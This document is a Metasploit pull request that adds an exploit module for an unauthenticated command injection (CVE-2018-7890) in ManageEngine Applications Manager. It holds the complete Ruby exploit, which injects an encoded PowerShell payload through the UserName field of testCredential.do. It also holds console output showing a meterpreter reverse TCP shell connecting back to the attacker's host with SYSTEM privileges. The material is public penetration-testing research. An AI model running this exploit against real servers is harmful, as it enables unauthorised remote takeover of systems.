### PR TITLE
Adding ManageEngine Application Manager RCE

### DIFF
--- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
+++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
@@ -4,7 +4,7 @@ This module exploits command injection vulnerability in the ManageEngine Applica
 **Vulnerable Application Installation Steps**
 
 Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else.
-[https://www.manageengine.com/products/applications_manager/download.html](https://www.manageengine.com/products/applications_manager/download.html)
+[http://archives.manageengine.com/applications_manager/13630/](http://archives.manageengine.com/applications_manager/13630/)
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
+++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
@@ -1,0 +1,46 @@
+## Vulnerable Application
+This module exploits command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer.
+
+**Vulnerable Application Installation Steps**
+
+Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else.
+[https://www.manageengine.com/products/applications_manager/download.html](https://www.manageengine.com/products/applications_manager/download.html)
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/securityonion_xplico_exec`
+- [ ] Set `RHOST`
+- [ ] Set `PAYLOAD windows/meterpreter/reverse_tcp`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target is vulnerable.` in console.
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `Triggering the vulnerability` in console.
+- [ ] **Verify** that you are seeing `Sending stage (179779 bytes) to <TARGET>` in console.
+- [ ] **Verify** that you have your shell.
+
+## Scenarios
+
+```
+msf5 > 
+msf5 > use exploit/windows/http/manageengine_appmanager_exec 
+msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
+RHOST => 12.0.0.192
+msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
+LHOST => 12.0.0.1
+msf5 exploit(windows/http/manageengine_appmanager_exec) > check
+[+] 12.0.0.192:9090 The target is vulnerable.
+msf5 exploit(windows/http/manageengine_appmanager_exec) > run
+
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Trigerring the vulnerability
+[*] Sending stage (179779 bytes) to 12.0.0.192
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```

--- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
+++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
@@ -11,15 +11,15 @@ Go to following website and download Windows version of the product. It comes wi
 A successful check of the exploit will look like this:
 
 - [ ] Start `msfconsole`
-- [ ] `use exploit/linux/http/securityonion_xplico_exec`
-- [ ] Set `RHOST`
+- [ ] `use exploit/windows/http/manageengine_appmanager_exec`
+- [ ] Set `RHOST <RHOST>`
 - [ ] Set `PAYLOAD windows/meterpreter/reverse_tcp`
-- [ ] Set `LHOST`
+- [ ] Set `LHOST <LHOST>`
 - [ ] Run `check`
 - [ ] **Verify** that you are seeing `The target is vulnerable.` in console.
 - [ ] Run `exploit`
 - [ ] **Verify** that you are seeing `Triggering the vulnerability` in console.
-- [ ] **Verify** that you are seeing `Sending stage (179779 bytes) to <TARGET>` in console.
+- [ ] **Verify** that you are seeing `Sending stage to <TARGET>` in console.
 - [ ] **Verify** that you have your shell.
 
 ## Scenarios

--- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
+++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
@@ -1,5 +1,5 @@
 ## Vulnerable Application
-This module exploits command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer.
+This module exploits command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer.
 
 **Vulnerable Application Installation Steps**
 

--- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb
+++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb
@@ -65,6 +65,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') unless check == Exploit::CheckCode::Vulnerable
+
     powershell_options = {
       encode_final_payload: true,
       remove_comspec: true

--- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb
+++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb
@@ -9,17 +9,17 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Powershell
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
       'Name'           => "ManageEngine Applications Manager Remote Code Execution",
-      'Description'    => %q{
+      'Description'    => %q(
         This module exploits command injection vulnerability in the ManageEngine Application Manager product.
         An unauthenticated user can execute a operating system command under the context of privileged user.
 
         Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
         by accessing given system. This endpoint calls a several internal classes and then executes powershell script
         without validating user supplied parameter when the given system is OfficeSharePointServer.
-      },
+      ),
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
@@ -40,8 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'BadChars' => "\x22"
         },
       'Platform'       => ['win'],
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'Targets'         => [ ['Automatic', {}] ],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        => [['Automatic', {}]],
       'Privileged'     => true,
       'DisclosureDate' => 'Mar 7 2018',
       'DefaultTarget'  => 0
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
       'vars_post' => {
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Password' => Rex::Text.rand_text_alpha(3),
         'UserName' => Rex::Text.rand_text_alpha(3)
       }
-    })
+    )
     if res && res.body.include?('Kindly check the credentials and try again')
       Exploit::CheckCode::Vulnerable
     else
@@ -83,7 +83,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
     powershell_options = {
       encode_final_payload: true,
       remove_comspec: true
@@ -92,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Triggering the vulnerability')
 
-    send_request_cgi({
+    send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
       'vars_post' => {
@@ -111,7 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Password' => Rex::Text.rand_text_alpha(3),
         'UserName' => "$(#{p})"
       }
-    })
-
+    )
   end
 end

--- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb
+++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2018-7890'],
           ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
         ],
-      'DefaultOptions'  =>
+      'DefaultOptions' =>
         {
           'WfsDelay' => 10,
           'RPORT' => 9090
@@ -44,8 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Targets'        => [['Automatic', {}]],
       'Privileged'     => true,
       'DisclosureDate' => 'Mar 7 2018',
-      'DefaultTarget'  => 0
-    ))
+      'DefaultTarget'  => 0))
 
     register_options(
       [

--- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb
+++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb
@@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'     =>
         [
+          ['CVE', '2018-7890'],
           ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
         ],
       'DefaultOptions'  =>

--- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb
+++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine Applications Manager Remote Code Execution",
+      'Description'    => %q{
+        This module exploits command injection vulnerability in the ManageEngine Application Manager product.
+        An unauthenticated user can execute a operating system command under the context of privileged user.
+
+        Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
+        by accessing given system. This endpoint calls a several internal classes and then executes powershell script
+        without validating user supplied parameter when the given system is OfficeSharePointServer.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 10,
+          'RPORT' => 9090
+        },
+      'Payload' =>
+        {
+          'BadChars' => "\x22"
+        },
+      'Platform'       => ['win'],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'         => [ ['Automatic', {}] ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Mar 7 2018',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
+      'vars_post' => {
+        'method' => 'testCredentialForConfMonitors',
+        'type' => 'OfficeSharePointServer',
+        'montype' => 'OfficeSharePointServer',
+        'isAgentEnabled' => 'NO',
+        'isAgentAssociated' => 'false',
+        'displayname' => Rex::Text.rand_text_alpha(10),
+        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
+        'Version' => '2013',
+        'Powershell' => 'True', # :-)
+        'CredSSP' => 'False',
+        'SPType' => 'SPServer',
+        'CredentialDetails' => 'nocm',
+        'Password' => Rex::Text.rand_text_alpha(3),
+        'UserName' => Rex::Text.rand_text_alpha(3)
+      }
+    })
+    if res && res.body.include?('Kindly check the credentials and try again')
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    powershell_options = {
+      encode_final_payload: true,
+      remove_comspec: true
+    }
+    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
+
+    print_status('Triggering the vulnerability')
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
+      'vars_post' => {
+        'method' => 'testCredentialForConfMonitors',
+        'type' => 'OfficeSharePointServer',
+        'montype' => 'OfficeSharePointServer',
+        'isAgentEnabled' => 'NO',
+        'isAgentAssociated' => 'false',
+        'displayname' => Rex::Text.rand_text_alpha(10),
+        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
+        'Version' => '2013',
+        'Powershell' => 'True', # :-)
+        'CredSSP' => 'False',
+        'SPType' => 'SPServer',
+        'CredentialDetails' => 'nocm',
+        'Password' => Rex::Text.rand_text_alpha(3),
+        'UserName' => "$(#{p})"
+      }
+    })
+
+  end
+end

--- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb
+++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb
@@ -54,26 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
-      'vars_post' => {
-        'method' => 'testCredentialForConfMonitors',
-        'type' => 'OfficeSharePointServer',
-        'montype' => 'OfficeSharePointServer',
-        'isAgentEnabled' => 'NO',
-        'isAgentAssociated' => 'false',
-        'displayname' => Rex::Text.rand_text_alpha(10),
-        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
-        'Version' => '2013',
-        'Powershell' => 'True', # :-)
-        'CredSSP' => 'False',
-        'SPType' => 'SPServer',
-        'CredentialDetails' => 'nocm',
-        'Password' => Rex::Text.rand_text_alpha(3),
-        'UserName' => Rex::Text.rand_text_alpha(3)
-      }
-    )
+    res = trigger_endpoint(Rex::Text.rand_text_alpha(3))
     if res && res.body.include?('Kindly check the credentials and try again')
       Exploit::CheckCode::Vulnerable
     else
@@ -90,6 +71,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Triggering the vulnerability')
 
+    trigger_endpoint("$(#{p})")
+  end
+
+  def trigger_endpoint(username)
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
@@ -99,15 +84,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'montype' => 'OfficeSharePointServer',
         'isAgentEnabled' => 'NO',
         'isAgentAssociated' => 'false',
-        'displayname' => Rex::Text.rand_text_alpha(10),
+        'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
         'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
-        'Version' => '2013',
         'Powershell' => 'True', # :-)
         'CredSSP' => 'False',
         'SPType' => 'SPServer',
         'CredentialDetails' => 'nocm',
         'Password' => Rex::Text.rand_text_alpha(3),
-        'UserName' => "$(#{p})"
+        'UserName' => username
       }
     )
   end

--- a/modules/exploits/windows/http/manageengine_appmanager_exec.rb
+++ b/modules/exploits/windows/http/manageengine_appmanager_exec.rb
@@ -28,7 +28,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['CVE', '2018-7890'],
-          ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
+          ['BID', '103358'],
+          ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'],
+          ['URL', 'https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager']
         ],
       'DefaultOptions' =>
         {


### PR DESCRIPTION
This module exploits command injection vulnerability -0day as far as I know- in the ManageEngine Application Manager product. An unauthenticated user can execute a operating system command under the context of privileged user.

A successful check of the exploit will look like this:

- [x] Start `msfconsole`
- [ ] `use exploit/linux/http/securityonion_xplico_exec`
- [ ] Set `RHOST`
- [ ] Set `PAYLOAD windows/meterpreter/reverse_tcp`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target is vulnerable.` in console.
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `Triggering the vulnerability` in console.
- [ ] **Verify** that you are seeing `Sending stage (179779 bytes) to <TARGET>` in console.
- [ ] **Verify** that you have your shell.

## Scenarios

```
msf5 > 
msf5 > use exploit/windows/http/manageengine_appmanager_exec 
msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
RHOST => 12.0.0.192
msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf5 exploit(windows/http/manageengine_appmanager_exec) > check
[+] 12.0.0.192:9090 The target is vulnerable.
msf5 exploit(windows/http/manageengine_appmanager_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Trigerring the vulnerability
[*] Sending stage (179779 bytes) to 12.0.0.192

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

**Technical Details and Module Demo**
[https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/](https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/)